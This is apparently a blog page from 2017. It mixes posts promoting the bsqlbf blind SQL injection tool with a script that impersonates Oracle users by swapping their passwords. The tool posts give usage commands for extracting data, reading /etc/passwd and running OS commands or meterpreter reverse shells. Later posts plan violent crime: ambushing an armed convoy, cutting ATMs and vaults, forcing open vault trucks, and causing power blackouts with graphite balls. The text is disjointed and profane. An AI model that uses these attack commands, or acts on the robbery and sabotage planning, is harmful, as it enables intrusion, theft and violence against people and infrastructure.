Wednesday, October 11, 2017

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).
This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections
Supported Database:
  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle
The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in “order by” and “group by”.
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.


at No comments:

CODE FOR SQL INJECTION WITH WHITEHAT DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC

Blind Sql Injection Brute Forcer version 2
This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.
Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"
User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl



// Blind SQL injection brute forcer \\

//originally written by...aramosf@514.es  \\



// mofified by sid-at-notsosecure.com \\

// http://www.notsosecure.com \\

---------------------usage:-------------------------------------------



Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options)



String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options)



------------------------------------options:--------------------------

-sql:          valid SQL syntax to get; version(), database(),

(select  table_name from inforamtion_schema.tables limit 1 offset 0)

-get:          If MySQL user is root, supply word readable file name

-blind:        parameter to inject sql. Default is last value of url

-match:        *RECOMMENDED* string to match in valid query, Default is auto

-start:        if you know the beginning of the string, use it.

-length:       maximum length of value. Default is 32.

-time:         timer options:

0:      dont wait. Default option.

1:      wait 15 seconds

2:      wait 5 minutes



-type:         Type of injection:

0:      Type 0 (default) is blind injection based on True and False responses

1:      Type 1 is blind injection based on True and Error responses

2:      Type 2 is injection in order by and group by

3:      Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

4:      Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)

5:      Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)



-file: File to read (default C:\boot.ini)



-stype:        How you want to execute command:

0:      SType 0 (default) is based on java..will NOT work against XE

1:      SType 1 is against oracle 9 with plsql_native_make_utility

2:      SType 2 is against oracle 10 with dbms_scheduler

-database:     Backend database:

0:      MS-SQL (Default)

1:      MYSQL

2:      POSTGRES

3:      ORACLE

-rtime:        wait random seconds, for example: "10-20".

-method:       http method to use; get or post. Default is GET.

-cmd:          command to execute(type 4 only). Default is "ping 127.0.0.1."

-uagent:       http UserAgent header to use. Default is bsqlbf 2.3

-ruagent:      file with random http UserAgent header to use.

-cookie:       http cookie header to use

-rproxy:       use random http proxy from file list.

-proxy:        use proxy http. Syntax -proxy=http://proxy:port/

-proxy_user:   proxy http user

-proxy_pass:   proxy http password



---------------------------- examples:-------------------------------

bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1



bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"
at No comments:

Ok, boolean tribe..the hoores feel very much protected still by Oracle. So, let me be a bitch and not an intelectual! Let'me digg this 1st aspect " the actual username can be spoofed by use of BECOME USER. This leads to the fact that some spoofing can be done before the session" I want to transfer data from the piece of shit, not exacly on a MIM's. So I do get in, as BECOME USER?let me start beeing a bitch! over with brains olympic games NSA!

How to become another User in SQLPlus

See this link for a much better way to achieve this in current releases, using proxy users...
A DBA frequently needs to become another user to test something or verify a problem.  Short of having to gain acess to that users password, we are asked can I su to that account, sort of like root does on unix.
This is an 'su.sql' script I use:
 
whenever sqlerror exitcolumn password new_value pw
declare
    l_passwd varchar2(45);
begin
    select password into l_passwd
      from sys.dba_users
     where username = upper('&1');
end;
/
select password
  from sys.dba_users
 where username = upper( '&1' )
/
alter user &1 identified by Hello;
connect &1/hello
alter user &1 identified by values '&pw';
show user
whenever sqlerror continue

it starts by testing your access to the sys.dba_users table -- if that fails -- it exits SQLPlus.  If zero rows returned -- it exits SQLPlus.
It then selects the 'password' from the dba_users table and stuffs it into a macro variable "&pw"
We alter the user you want to become to have a known password (if that fails, we exit).
We 'fix' their password back after loggin in as them....
Note, you need to have access to dba_users and the alter user privelege.

All information and materials provided here are provided "as-is"; Oracle disclaims all express and implied warranties, including, the implied warranties of merchantability or fitness for a particular use. Oracle shall not be liable for any damages, including, direct, indirect, incidental, special or consequential damages for loss of profits, revenue, data or data use, incurred by you or any third party in connection with the use of this information or these materials.

https://asktom.oracle.com/Misc/su.html
at No comments:

Nickelback - Get 'Em Up

at No comments:

what about the drones gang? let's make a palestinian move...the tunnel. tunnel for car exist and train dispersion


Elsa David so...get ready for the maps, their schedule, their path...and do it
at No comments:

Good morning crew! welcome back to war! So, we're talking about a big convoy of at least 15 "géninhos" heavly armed. 2 cars, 4 agents, 1 jipe, 3 agents, the truck, 4 agents, one car ,2 agents! So, best path is near Parque das Nações, and our best shot, is a sonic attack, to neutralize their movements.

at No comments:

Tuesday, October 10, 2017

remember I bought that 1300'C Metal Melting Butane Jet Torch ?...like i said to you, you need 2500.º C to cut trought 15 cm of steel doors, but 1300.º cutcommon vaults or ATM's

at No comments:

I HAVE A PLAN...ARE U IN?





at No comments:

I just got my amulet, my dark wolf and the boar theet...wolfs are the most surving animals there is...they loose here, for an incredible disavantdge on water...and another night of hunger...after running on the most difficult envirement of all...like myself...eventually I'll get my meal.

at No comments:

Ok, everybody...the best plan until now, is have vault truck stopped on the endpoint receptor, and use a ton lifter hydraulic and then an also hydraulic spreader opening steel doors, forced entry

HYDRAULIC TON LIFTER 


  

                                            The Broco® CF-3 (Crow's Foot) Hydraulic Spreader assists in opening all types inward and outward opening doors and is ideal for distorting/destroying security gates and window bars.  Machined from hardened billet steel, the CF-3 has unbelievable strength and maximum reliability making it tougher than forged alternatives. The unique 90 degree hose swivel enables it to be easily utilized in all positions.

https://www.broco-rankin.com/tactical/forced-entry/cf-3-/
at No comments:

Hello worldwide!!! welcome back to war! Guys were saying to me (and I already saw it) banking vault trucks usualy have tubular locks (as ATM's) like this...( the Medeco Tx is not really used...but we'll go there)

at No comments:
Subscribe to: Posts (Atom)

Energy Blackouts total electric outage graphite carbon balls trow 2 ground impact

  https://www.alibaba.com/product-detail/Graphite-Carbon-Ball-C80-Instead-of_1601156433008.html?spm=a2700.galleryofferlist.normal_offer.d_ti...